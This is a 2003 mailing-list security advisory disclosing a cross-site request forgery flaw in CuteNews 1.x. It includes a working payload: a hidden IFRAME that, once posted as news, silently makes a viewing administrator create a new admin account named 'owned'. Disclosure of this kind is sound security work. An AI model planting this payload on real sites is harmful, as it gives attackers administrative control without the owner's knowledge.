Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

Admin Account Creation Vulnerability in CuteNews 1.x

From: "Peter Winter-Smith" <peter4020 () hotmail com>
Date: Sun, 29 Jun 2003 09:04:58 +0000
Admin Account Creation Vulnerability in CuteNews 1.x

Url: http://www.cutephp.com

CuteNews is an efficient, user-friendly and well designed news system
which is both easy to set up, and doesn't even require SQL to function
instead creating it's own databases.

It supports multiple user levels, such as Journalist (3), Editor (2)
and Admininistrator (1), and has taken precautions to ensure that
field injection cannot alter the user level, by placing the user level
at the start of the database, rather than after any given field.

It does however allow the minor users to post HTML content in their
posts, which could lead to cross site scripting cookie 'stealing',
but luckily the creator has only stored MD5 hashes of the password,
so that accounts cannot be directly stolen.

It appears however that CuteNews does not filter urls relating to the
site itself, or rather the CuteNews control panel.

Therefore, if a user was to inject the correct commands into a news
article in a hidden IFRAME, or some such control, then upon the
administrator browing to the news page after having signed in to
CuteNews the commands would be executed and the administrator would be
none the wiser.

Example:

--------------------------------[Start Post]-------------------------------

Blah, blah, welcome to site.com, etc.
<iframe src="index.php?regusername=owned&regpassword=pass&regnickname=owned&regemail=none () none com&reglevel=1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe> 
---------------------------------[End Post]--------------------------------

If the above data was posted on the news page, the administrator accounts
would be able to execute the command without any notification at all.

That URL in particular adds an administrator account with the username
'owned' and the password 'pass'.

================================================================


Operating system and servicepack level:
Any operating system.


Software:
CuteNews, PHP 4+

Under what circumstances the vulnerability was discovered:
Messing around with CuteNews


If the vendor has been notified:
Yes.


How to contact you for further information:
I can always be reached at peter4020 () hotmail com


Please credit this find to:
Peter Winter-Smith


Thank you for your time,
-Peter

_________________________________________________________________
Tired of 56k? Get a FREE BT Broadband connection http://www.msn.co.uk/specials/btbroadband
Previous By Date Next
Previous By Thread Next

Current thread: